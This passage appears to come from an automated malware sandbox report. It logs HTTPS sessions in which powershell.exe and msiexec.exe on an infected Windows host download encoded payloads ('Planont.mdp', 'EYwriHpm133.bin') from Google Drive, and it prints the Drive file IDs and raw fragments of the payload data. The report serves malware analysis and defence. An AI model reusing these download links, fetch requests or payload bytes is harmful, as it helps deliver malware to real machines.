                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                    Server: ESF
                                                                                                    Content-Length: 0
                                                                                                    X-XSS-Protection: 0
                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                    X-Content-Type-Options: nosniff
                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                    Connection: close


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    1192.168.2.449731142.250.186.974436044C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-10-24 06:46:07 UTC233OUTGET /download?id=1q6CY4oUtcou-aVhA3_vUUUrfOOBqCrd8&export=download HTTP/1.1
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                    Host: drive.usercontent.google.com
                                                                                                    Connection: Keep-Alive
                                                                                                    2024-10-24 06:46:11 UTC4913INHTTP/1.1 200 OK
                                                                                                    Content-Type: application/octet-stream
                                                                                                    Content-Security-Policy: sandbox
                                                                                                    Content-Security-Policy: default-src 'none'
                                                                                                    Content-Security-Policy: frame-ancestors 'none'
                                                                                                    X-Content-Security-Policy: sandbox
                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                    Cross-Origin-Embedder-Policy: require-corp
                                                                                                    Cross-Origin-Resource-Policy: same-site
                                                                                                    X-Content-Type-Options: nosniff
                                                                                                    Content-Disposition: attachment; filename="Planont.mdp"
                                                                                                    Access-Control-Allow-Origin: *
                                                                                                    Access-Control-Allow-Credentials: false
                                                                                                    Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                                    Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                    Accept-Ranges: bytes
                                                                                                    Content-Length: 479288
                                                                                                    Last-Modified: Wed, 23 Oct 2024 05:58:40 GMT
                                                                                                    X-GUploader-UploadID: AHmUCY2Uzrk4eTYhrnRvfgpl46ACshd-xr1E0bltT0sN9mnrd2aNxWv8yKRHpvMp2Q0KKr1aCvsrGPWtPw
                                                                                                    Date: Thu, 24 Oct 2024 06:46:11 GMT
                                                                                                    Expires: Thu, 24 Oct 2024 06:46:11 GMT
                                                                                                    Cache-Control: private, max-age=0
                                                                                                    X-Goog-Hash: crc32c=SrenDA==
                                                                                                    Server: UploadServer
                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                    Connection: close
                                                                                                    2024-10-24 06:46:11 UTC4913INData Raw: 36 77 49 34 6e 48 45 42 6d 37 74 6c 45 51 30 41 63 51 47 62 36 77 49 4e 69 77 4e 63 4a 41 52 78 41 5a 76 72 41 6a 34 54 75 58 62 6b 4b 33 76 72 41 73 6b 6c 36 77 4b 7a 62 6f 48 70 67 75 39 2b 44 2b 73 43 45 47 4a 78 41 5a 75 42 36 66 54 30 72 47 76 72 41 6e 6d 6d 36 77 4c 6a 54 33 45 42 6d 2b 73 43 67 79 57 36 4f 2f 64 49 51 58 45 42 6d 33 45 42 6d 33 45 42 6d 2b 73 43 77 76 49 78 79 6e 45 42 6d 33 45 42 6d 34 6b 55 43 33 45 42 6d 33 45 42 6d 39 48 69 63 51 47 62 36 77 49 59 43 59 50 42 42 4f 73 43 4a 63 64 78 41 5a 75 42 2b 56 76 42 6e 77 46 38 7a 58 45 42 6d 2b 73 43 38 52 43 4c 52 43 51 45 63 51 47 62 36 77 4a 33 62 6f 6e 44 63 51 47 62 36 77 49 42 69 59 48 44 67 31 4c 4a 41 48 45 42 6d 33 45 42 6d 37 71 30 39 35 72 68 63 51 47 62 63 51 47 62 67 66 4a
                                                                                                    Data Ascii: 6wI4nHEBm7tlEQ0AcQGb6wINiwNcJARxAZvrAj4TuXbkK3vrAskl6wKzboHpgu9+D+sCEGJxAZuB6fT0rGvrAnmm6wLjT3EBm+sCgyW6O/dIQXEBm3EBm3EBm+sCwvIxynEBm3EBm4kUC3EBm3EBm9HicQGb6wIYCYPBBOsCJcdxAZuB+VvBnwF8zXEBm+sC8RCLRCQEcQGb6wJ3bonDcQGb6wIBiYHDg1LJAHEBm3EBm7q095rhcQGbcQGbgfJ
                                                                                                    2024-10-24 06:46:11 UTC4871INData Raw: 4e 74 69 6c 48 56 58 6f 48 63 69 54 6c 4e 36 74 6d 6c 48 48 4e 74 49 79 59 51 35 78 50 69 6b 71 59 6c 64 37 78 36 78 7a 67 42 4d 72 6d 48 71 4f 6e 45 6f 5a 71 79 64 6e 35 65 72 34 65 35 2b 54 61 38 38 4b 32 75 63 73 72 69 4c 6d 4f 64 51 35 42 53 32 32 52 6a 4a 4d 6d 38 71 47 44 42 68 68 78 56 52 69 74 39 7a 52 45 32 57 68 36 4c 62 4a 59 5a 58 2f 59 33 38 6d 69 39 6f 7a 54 59 5a 50 30 6f 52 4b 30 4c 55 4a 57 49 6f 52 68 4c 6f 52 66 34 46 37 63 4f 34 77 6f 43 6d 44 57 67 4a 45 32 78 46 39 56 32 61 70 61 32 37 55 52 66 47 7a 6e 34 39 74 39 69 48 55 76 73 6d 47 79 33 56 4a 6c 63 46 70 35 41 6d 41 37 37 38 34 73 6b 32 39 74 6f 59 5a 43 67 36 58 57 62 58 53 4a 55 4a 4e 46 4f 66 39 39 6a 5a 52 56 2b 74 57 2f 7a 73 4e 56 4f 76 52 65 4c 4a 76 59 6a 6c 33 63 6b 39
                                                                                                    Data Ascii: NtilHVXoHciTlN6tmlHHNtIyYQ5xPikqYld7x6xzgBMrmHqOnEoZqydn5er4e5+Ta88K2ucsriLmOdQ5BS22RjJMm8qGDBhhxVRit9zRE2Wh6LbJYZX/Y38mi9ozTYZP0oRK0LUJWIoRhLoRf4F7cO4woCmDWgJE2xF9V2apa27URfGzn49t9iHUvsmGy3VJlcFp5AmA7784sk29toYZCg6XWbXSJUJNFOf99jZRV+tW/zsNVOvReLJvYjl3ck9
                                                                                                    2024-10-24 06:46:11 UTC1324INData Raw: 61 51 6b 54 30 6d 6b 4a 45 39 4a 70 43 52 50 53 61 51 6b 54 30 6d 6b 4a 45 39 4b 66 46 36 50 59 4d 4a 4b 50 74 6a 70 54 64 34 74 69 5a 46 66 6e 63 36 46 41 57 66 54 68 45 74 4a 70 58 36 33 63 4b 36 76 58 55 36 2b 33 52 4c 71 47 69 4f 57 62 67 6c 74 4a 55 34 63 57 46 6b 32 37 69 4f 57 30 42 62 41 49 68 66 57 41 39 4e 4e 65 6c 43 73 41 47 79 73 6b 51 49 58 72 54 35 72 6c 5a 6c 56 4a 37 47 37 35 56 75 65 59 55 41 76 7a 56 63 50 58 64 44 6e 65 36 6b 31 65 39 77 61 72 68 77 51 32 47 6c 6d 77 4a 4b 2b 30 54 4c 54 6f 38 34 67 4f 4e 31 6d 61 52 2b 38 49 45 39 4c 54 72 30 54 72 35 6c 69 71 61 53 5a 70 6d 46 4f 41 79 53 30 6d 79 49 6a 69 4a 33 61 4a 72 31 4f 41 42 78 30 2b 50 46 36 50 57 34 34 41 48 45 2f 74 77 6d 54 63 63 7a 75 34 7a 6e 6b 35 35 32 65 77 48 57 67
                                                                                                    Data Ascii: aQkT0mkJE9JpCRPSaQkT0mkJE9KfF6PYMJKPtjpTd4tiZFfnc6FAWfThEtJpX63cK6vXU6+3RLqGiOWbgltJU4cWFk27iOW0BbAIhfWA9NNelCsAGyskQIXrT5rlZlVJ7G75VueYUAvzVcPXdDne6k1e9warhwQ2GlmwJK+0TLTo84gON1maR+8IE9LTr0Tr5liqaSZpmFOAyS0myIjiJ3aJr1OABx0+PF6PW44AHE/twmTcczu4znk552ewHWg
                                                                                                    2024-10-24 06:46:11 UTC1378INData Raw: 51 4a 79 4c 36 4d 37 38 56 77 63 34 77 5a 42 62 45 52 39 62 35 45 34 52 30 6d 6d 77 39 66 62 78 67 74 39 67 44 4e 42 32 54 70 64 65 73 4b 6d 2f 30 66 39 55 52 34 77 4c 57 57 44 37 2f 53 36 4f 42 55 36 43 49 4d 32 35 78 45 4f 71 48 4e 70 63 2b 4a 75 71 77 79 47 30 66 58 68 76 73 4a 75 67 59 74 74 6f 36 4f 41 57 50 67 75 65 6b 69 4d 6d 38 33 68 6b 36 50 69 39 45 44 64 4c 52 57 77 37 68 64 69 68 36 4d 2b 72 44 77 66 59 6b 69 53 34 6a 54 59 45 36 4f 66 49 50 33 61 61 51 6b 37 67 36 42 72 6a 39 44 44 4b 70 55 78 57 41 6a 4e 6d 56 6b 36 53 53 30 6d 72 78 4d 64 4f 76 5a 2b 44 73 76 59 59 48 39 63 50 76 66 36 2f 35 6b 6f 49 64 44 72 61 4c 67 6e 35 33 4d 54 38 4d 38 52 52 30 45 71 30 55 4d 4a 4e 67 2b 4b 45 56 4e 42 70 43 64 2b 70 32 49 63 64 33 52 66 79 41 68 6f
                                                                                                    Data Ascii: QJyL6M78Vwc4wZBbER9b5E4R0mmw9fbxgt9gDNB2TpdesKm/0f9UR4wLWWD7/S6OBU6CIM25xEOqHNpc+JuqwyG0fXhvsJugYtto6OAWPguekiMm83hk6Pi9EDdLRWw7hdih6M+rDwfYkiS4jTYE6OfIP3aaQk7g6Brj9DDKpUxWAjNmVk6SS0mrxMdOvZ+DsvYYH9cPvf6/5koIdDraLgn53MT8M8RR0Eq0UMJNg+KEVNBpCd+p2Icd3RfyAho
                                                                                                    2024-10-24 06:46:11 UTC1378INData Raw: 6e 4b 4f 4c 45 4b 31 52 5a 42 6b 6a 2f 2f 37 32 66 38 59 52 38 6b 54 79 54 54 53 49 4a 6d 43 4f 44 37 61 51 6b 54 30 6d 6b 4a 45 39 4a 70 43 52 50 53 61 51 6b 54 30 6d 6b 4a 45 39 4a 70 43 52 50 53 61 51 6b 54 30 6d 6b 4a 45 79 55 36 4e 7a 6b 75 4f 46 6e 68 58 55 67 49 4e 68 49 53 6f 38 70 34 41 65 55 58 33 71 43 49 4a 2f 5a 68 79 57 49 35 36 44 30 33 44 6a 4c 57 53 42 35 45 75 44 39 47 56 76 4d 57 30 4f 38 54 42 76 54 4a 76 79 50 44 68 36 43 59 55 62 50 5a 68 67 36 37 37 6c 76 48 73 50 57 67 70 65 79 4d 2b 6c 37 5a 66 46 34 75 7a 77 59 54 44 66 67 4a 45 39 4a 70 43 52 50 53 61 51 6b 54 30 6d 6b 4a 45 39 4a 70 43 52 50 53 61 51 6b 54 30 6d 6b 4a 45 39 4a 70 43 52 50 53 6d 2f 6a 61 73 78 65 58 31 6b 71 56 61 73 74 77 79 61 53 53 35 6b 33 4f 63 34 2f 76 57
                                                                                                    Data Ascii: nKOLEK1RZBkj//72f8YR8kTyTTSIJmCOD7aQkT0mkJE9JpCRPSaQkT0mkJE9JpCRPSaQkT0mkJEyU6NzkuOFnhXUgINhISo8p4AeUX3qCIJ/ZhyWI56D03DjLWSB5EuD9GVvMW0O8TBvTJvyPDh6CYUbPZhg677lvHsPWgpeyM+l7ZfF4uzwYTDfgJE9JpCRPSaQkT0mkJE9JpCRPSaQkT0mkJE9JpCRPSm/jasxeX1kqVastwyaSS5k3Oc4/vW
                                                                                                    2024-10-24 06:46:11 UTC1378INData Raw: 39 59 44 77 30 32 71 55 4b 69 41 53 45 38 4a 34 36 65 48 45 56 46 2b 34 50 59 6b 45 31 6b 4b 77 54 45 74 48 42 53 39 6d 77 54 39 68 65 4d 79 73 57 76 61 6b 51 2b 57 4c 65 7a 30 56 58 39 59 7a 78 69 32 31 65 2b 33 61 53 46 4d 55 66 53 78 79 61 51 6b 63 58 55 2b 78 45 39 49 78 7a 6c 44 65 61 77 6b 54 30 6a 2b 33 63 49 51 59 46 35 49 6b 6e 58 67 63 72 75 6a 6e 2f 72 66 30 45 35 49 38 4d 72 69 4c 4e 65 6a 2f 58 4d 4d 68 61 55 4a 4f 34 4f 67 61 34 2f 53 4e 32 71 64 37 45 69 6a 51 68 2f 78 2b 4b 54 37 69 2f 79 34 53 35 55 39 75 49 42 4a 4c 2f 4a 6d 52 6f 76 4f 48 57 67 52 4e 67 78 42 54 6d 6b 55 52 2f 66 35 44 61 6c 78 79 72 63 2b 77 56 51 2f 2b 30 52 6e 74 55 4a 63 49 4e 31 6d 72 32 34 62 59 77 39 64 53 55 4d 2f 58 62 4c 57 72 67 30 42 62 6a 31 75 4c 43 42 46
                                                                                                    Data Ascii: 9YDw02qUKiASE8J46eHEVF+4PYkE1kKwTEtHBS9mwT9heMysWvakQ+WLez0VX9Yzxi21e+3aSFMUfSxyaQkcXU+xE9IxzlDeawkT0j+3cIQYF5IknXgcrujn/rf0E5I8MriLNej/XMMhaUJO4Oga4/SN2qd7EijQh/x+KT7i/y4S5U9uIBJL/JmRovOHWgRNgxBTmkUR/f5Dalxyrc+wVQ/+0RntUJcIN1mr24bYw9dSUM/XbLWrg0Bbj1uLCBF
                                                                                                    2024-10-24 06:46:11 UTC1378INData Raw: 53 54 4c 6a 74 52 35 42 52 54 54 38 62 4e 4e 31 36 73 36 35 4d 33 4e 6c 4f 65 65 33 52 32 43 34 6a 38 53 6e 32 54 56 46 74 2b 61 63 7a 6e 38 4a 76 6d 41 76 56 2b 74 4c 7a 5a 45 53 4f 4c 6e 71 71 30 65 38 68 36 39 37 44 43 69 46 79 4a 6f 44 37 54 2b 4e 78 71 2f 4e 74 64 7a 5a 44 37 58 66 55 57 6a 65 6a 34 4d 32 48 31 62 70 49 6a 72 42 55 67 54 54 36 32 57 4f 49 6c 71 4a 49 6c 56 4a 6d 49 48 2b 6a 4f 79 34 6a 35 67 35 49 6c 2f 4f 4e 30 4a 65 41 2b 4c 63 5a 4f 70 58 43 32 51 62 48 68 45 68 6d 69 63 52 30 55 72 32 31 75 31 46 4a 48 63 52 59 4a 77 33 41 4d 79 31 63 67 2f 6d 55 46 4f 6a 5a 36 75 4a 52 66 67 75 43 4e 50 72 61 61 34 44 46 49 6b 68 56 48 61 53 59 4c 36 4d 36 4a 75 57 41 58 6b 6a 32 69 52 6c 6a 47 36 4d 35 70 67 4e 33 53 51 45 37 67 36 68 4c 70 39
                                                                                                    Data Ascii: STLjtR5BRTT8bNN16s65M3NlOee3R2C4j8Sn2TVFt+aczn8JvmAvV+tLzZESOLnqq0e8h697DCiFyJoD7T+Nxq/NtdzZD7XfUWjej4M2H1bpIjrBUgTT62WOIlqJIlVJmIH+jOy4j5g5Il/ON0JeA+LcZOpXC2QbHhEhmicR0Ur21u1FJHcRYJw3AMy1cg/mUFOjZ6uJRfguCNPraa4DFIkhVHaSYL6M6JuWAXkj2iRljG6M5pgN3SQE7g6hLp9
                                                                                                    2024-10-24 06:46:11 UTC1378INData Raw: 4b 43 31 39 78 68 43 38 66 6c 70 48 78 47 64 6e 4e 4e 6e 30 32 41 57 6c 45 50 4d 45 6a 4f 51 67 56 72 74 57 6c 77 6b 77 67 70 35 57 61 51 6b 54 33 57 67 35 6b 39 4a 70 43 52 50 53 61 51 6b 54 30 6d 6b 4a 45 39 4a 70 43 52 50 53 61 51 6b 54 30 6d 6b 4a 45 39 4a 70 43 52 50 53 61 51 6e 67 6b 39 6d 58 62 67 62 5a 71 53 6a 4d 56 31 38 7a 61 41 6c 2f 65 31 47 42 73 5a 37 57 61 65 42 34 31 6d 6b 4a 53 4f 4f 37 58 71 7a 43 72 31 30 6f 55 35 35 44 73 69 75 72 69 4f 53 30 39 32 65 79 55 35 37 30 72 62 2b 38 69 4f 52 68 55 61 65 65 57 33 61 75 2b 6c 73 6e 78 4e 57 78 44 37 36 48 37 63 64 55 72 6a 57 61 7a 39 75 6d 4b 4e 30 77 6a 37 42 39 76 33 6a 48 79 6b 79 70 64 67 6e 33 6c 76 6f 36 54 46 76 73 4a 42 48 53 61 63 58 70 30 76 4e 53 43 30 68 58 64 51 6b 56 77 6b 51
                                                                                                    Data Ascii: KC19xhC8flpHxGdnNNn02AWlEPMEjOQgVrtWlwkwgp5WaQkT3Wg5k9JpCRPSaQkT0mkJE9JpCRPSaQkT0mkJE9JpCRPSaQngk9mXbgbZqSjMV18zaAl/e1GBsZ7WaeB41mkJSOO7XqzCr10oU55DsiuriOS092eyU570rb+8iORhUaeeW3au+lsnxNWxD76H7cdUrjWaz9umKN0wj7B9v3jHykypdgn3lvo6TFvsJBHSacXp0vNSC0hXdQkVwkQ
                                                                                                    2024-10-24 06:46:11 UTC1378INData Raw: 34 77 68 64 4a 70 43 52 50 53 61 51 6b 54 30 6d 6b 4a 45 39 4a 70 43 52 50 53 61 51 6b 54 30 6d 6b 4a 45 39 4a 70 43 52 50 53 61 51 6e 68 62 4f 50 42 6e 6d 75 4a 50 66 6b 43 64 78 58 36 31 6a 69 43 6e 73 70 72 43 52 4f 30 5a 73 34 6b 30 6d 6b 4a 45 39 4a 70 43 52 50 53 61 51 6b 54 30 6d 6b 4a 45 39 4a 70 43 52 50 53 61 51 6b 54 30 6d 6b 4a 45 39 4a 70 43 65 46 72 53 33 54 32 6e 58 53 44 51 44 32 57 34 47 57 65 6c 70 79 4c 30 6d 6b 4a 51 32 6f 57 54 47 4f 44 58 45 53 62 31 50 6f 38 4b 51 4e 43 78 68 59 71 6a 61 76 68 67 66 57 41 38 4e 74 71 6c 48 58 72 6d 6e 63 46 30 42 2f 66 44 46 6a 4b 43 4e 73 2f 67 35 63 34 57 31 59 63 4c 55 7a 33 41 51 6b 2f 44 39 37 73 72 39 45 4d 4a 4d 4c 41 73 4e 6a 5a 6d 38 46 34 42 31 74 48 68 78 75 48 66 52 70 68 31 35 47 58 4a
                                                                                                    Data Ascii: 4whdJpCRPSaQkT0mkJE9JpCRPSaQkT0mkJE9JpCRPSaQnhbOPBnmuJPfkCdxX61jiCnsprCRO0Zs4k0mkJE9JpCRPSaQkT0mkJE9JpCRPSaQkT0mkJE9JpCeFrS3T2nXSDQD2W4GWelpyL0mkJQ2oWTGODXESb1Po8KQNCxhYqjavhgfWA8NtqlHXrmncF0B/fDFjKCNs/g5c4W1YcLUz3AQk/D97sr9EMJMLAsNjZm8F4B1tHhxuHfRph15GXJ
                                                                                                    2024-10-24 06:46:11 UTC1378INData Raw: 6b 31 74 62 36 57 50 2b 63 6a 45 33 38 76 57 4e 67 75 75 35 6e 58 72 6e 36 4f 69 55 34 69 54 50 39 75 6f 55 4d 4d 43 49 37 65 31 4c 61 41 49 6e 6d 5a 4f 42 30 5a 62 57 61 56 71 6f 6c 45 44 50 44 56 4f 43 6c 4f 6b 38 56 34 6a 67 67 79 78 5a 34 6c 4f 61 37 44 49 2f 31 6f 6a 67 68 62 70 6a 67 6c 74 61 30 31 4f 6c 69 75 52 39 47 44 78 58 42 77 64 67 70 50 6f 54 45 6b 4b 76 4b 79 2b 38 45 35 39 54 79 74 6f 48 50 68 69 76 67 61 6c 54 2b 6a 70 33 50 6b 54 71 58 46 4a 44 61 6a 69 6e 31 31 35 63 78 46 6a 41 63 41 77 5a 49 6b 45 6f 4a 6e 7a 53 59 73 54 58 6b 5a 74 34 54 44 36 56 6d 6a 56 6f 44 6f 37 71 75 6e 77 52 35 68 4a 45 69 4b 6b 47 35 66 7a 49 43 77 42 6f 6f 64 65 71 49 42 37 74 5a 61 36 76 30 46 37 53 31 73 78 79 37 5a 7a 63 75 42 38 53 6e 67 72 4f 76 72 35
                                                                                                    Data Ascii: k1tb6WP+cjE38vWNguu5nXrn6OiU4iTP9uoUMMCI7e1LaAInmZOB0ZbWaVqolEDPDVOClOk8V4jggyxZ4lOa7DI/1ojghbpjglta01OliuR9GDxXBwdgpPoTEkKvKy+8E59TytoHPhivgalT+jp3PkTqXFJDajin115cxFjAcAwZIkEoJnzSYsTXkZt4TD6VmjVoDo7qunwR5hJEiKkG5fzICwBoodeqIB7tZa6v0F7S1sxy7ZzcuB8SngrOvr5


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    2192.168.2.449738142.250.185.1424437128C:\Windows\SysWOW64\msiexec.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-10-24 06:46:45 UTC216OUTGET /uc?export=download&id=1vjcptESgL1QfRWsuKo-4pCK5T2ipAUA4 HTTP/1.1
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                    Host: drive.google.com
                                                                                                    Cache-Control: no-cache
                                                                                                    2024-10-24 06:46:45 UTC1610INHTTP/1.1 303 See Other
                                                                                                    Content-Type: application/binary
                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                    Pragma: no-cache
                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                    Date: Thu, 24 Oct 2024 06:46:45 GMT
                                                                                                    Location: https://drive.usercontent.google.com/download?id=1vjcptESgL1QfRWsuKo-4pCK5T2ipAUA4&export=download
                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                    Content-Security-Policy: script-src 'nonce-pI_sEVIMvii4leNy9B6h-g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                    Server: ESF
                                                                                                    Content-Length: 0
                                                                                                    X-XSS-Protection: 0
                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                    X-Content-Type-Options: nosniff
                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                    Connection: close


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    3192.168.2.449739142.250.186.974437128C:\Windows\SysWOW64\msiexec.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-10-24 06:46:46 UTC258OUTGET /download?id=1vjcptESgL1QfRWsuKo-4pCK5T2ipAUA4&export=download HTTP/1.1
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                    Cache-Control: no-cache
                                                                                                    Host: drive.usercontent.google.com
                                                                                                    Connection: Keep-Alive
                                                                                                    2024-10-24 06:46:49 UTC4917INHTTP/1.1 200 OK
                                                                                                    Content-Type: application/octet-stream
                                                                                                    Content-Security-Policy: sandbox
                                                                                                    Content-Security-Policy: default-src 'none'
                                                                                                    Content-Security-Policy: frame-ancestors 'none'
                                                                                                    X-Content-Security-Policy: sandbox
                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                    Cross-Origin-Embedder-Policy: require-corp
                                                                                                    Cross-Origin-Resource-Policy: same-site
                                                                                                    X-Content-Type-Options: nosniff
                                                                                                    Content-Disposition: attachment; filename="EYwriHpm133.bin"
                                                                                                    Access-Control-Allow-Origin: *
                                                                                                    Access-Control-Allow-Credentials: false
                                                                                                    Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                                    Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                    Accept-Ranges: bytes
                                                                                                    Content-Length: 287296
                                                                                                    Last-Modified: Wed, 23 Oct 2024 05:45:25 GMT
                                                                                                    X-GUploader-UploadID: AHmUCY1vbNVBHfmuiTXx7eAKD8Klr67Be8K2tzb7_PODVThhXkmiUj6U4Tq3GQ20sgjviiadLkvACKJ_Ag
                                                                                                    Date: Thu, 24 Oct 2024 06:46:49 GMT
                                                                                                    Expires: Thu, 24 Oct 2024 06:46:49 GMT
                                                                                                    Cache-Control: private, max-age=0
                                                                                                    X-Goog-Hash: crc32c=LPFnww==
                                                                                                    Server: UploadServer
                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                    Connection: close
                                                                                                    2024-10-24 06:46:49 UTC4917INData Raw: 95 52 c7 76 61 28 83 c9 05 78 d8 4e 57 c3 62 2b 93 26 bb e2 65 89 8f d9 98 6c 83 b1 f3 fc 30 43 bc 66 db 96 80 cd b4 28 a5 d3 d7 57 44 9e 38 90 5d 39 33 35 c7 3c c7 68 6c ca 57 0e 7e ee 4a 68 be d7 5c 68 78 f5 2b f0 92 98 39 96 8e 56 bf 66 93 16 69 8b c0 dc 99 f4 19 5e 73 b5 e0 d8 9a f0 cd fb 70 dc 23 11 a5 0a 80 12 8a b6 00 b3 4f 72 61 89 b3 6d 3b 14 2e 14 a8 8e 01 a4 5f 4d 7e 30 9c 20 54 7c 3a 44 2b 82 46 64 a2 af 28 72 85 1c 02 d2 07 bd 61 19 80 f8 36 f1 80 ad 62 09 05 a8 19 57 61 bb 05 ad 51 33 e4 3f cb 75 c0 1f e7 e2 60 74 a2 64 74 b0 12 5b 94 cc d3 f3 9f 94 b0 9c 6f 29 40 55 be f9 60 e8 7b 54 9e f1 07 ae fb 54 3d 0b 4f 94 e4 3d 23 2e bf 94 c0 4a 0a 4f 6b 64 15 f0 1f 5c d7 29 9c f9 24 10 5f ce f4 0e e7 a3 00 66 04 ed 4c 3b 41 2d 1b 13 f5 d7 f2 16 af
                                                                                                    Data Ascii: Rva(xNWb+&el0Cf(WD8]935<hlW~Jh\hx+9Vfi^sp#Oram;._M~0 T|:D+Fd(ra6bWaQ3?u`tdt[o)@U`{TT=O=#.JOkd\)$_fL;A-
                                                                                                    2024-10-24 06:46:49 UTC4864INData Raw: 65 ea a6 c0 8f 0e 3c b4 a1 82 71 52 8f 89 9b 79 34 c7 41 6a d2 5a 1c 6e 92 cd bc 9c ba 09 98 4f 3c 88 ab 04 68 36 48 01 34 55 90 1d 68 c3 25 50 0d d0 45 02 1c 5c 77 8c a9 c0 5a 56 e5 fb 3f 6f 57 ee 1e 7c 3c 2f a9 1b 43 98 7a 7e ee 4a e4 fe 6d 35 5f 90 a0 95 0d aa 37 8b 8d 11 7f 63 42 51 2b 5d e2 1d e0 fe 83 26 ca 31 78 aa 65 3e f7 3d a2 7e dc ea 64 fd f1 34 68 60 50 ae c6 5f 80 7f a1 1a 13 c5 7d 93 aa 57 e7 21 18 05 0f dd bf 88 03 87 4a 56 78 0e 95 67 03 41 c5 9a 0c c2 92 78 c3 91 3f 73 0b bd c0 8a 48 3e 7b 32 21 52 66 f9 cd 3a 01 3e 65 bf 52 e9 14 48 a6 b7 3d fe 78 22 9a 81 dd 26 c0 ce a5 e3 5b de 52 92 41 b4 6d 34 ea c9 36 51 a7 aa 30 03 9a 4f 3b 5b bc 38 1d dd ed 6e c7 48 a2 ea e5 7e e8 a4 4a ff 59 60 5f 52 7e 78 01 ab e3 7d 20 c9 c1 4e e7 d3 14 bb 5a
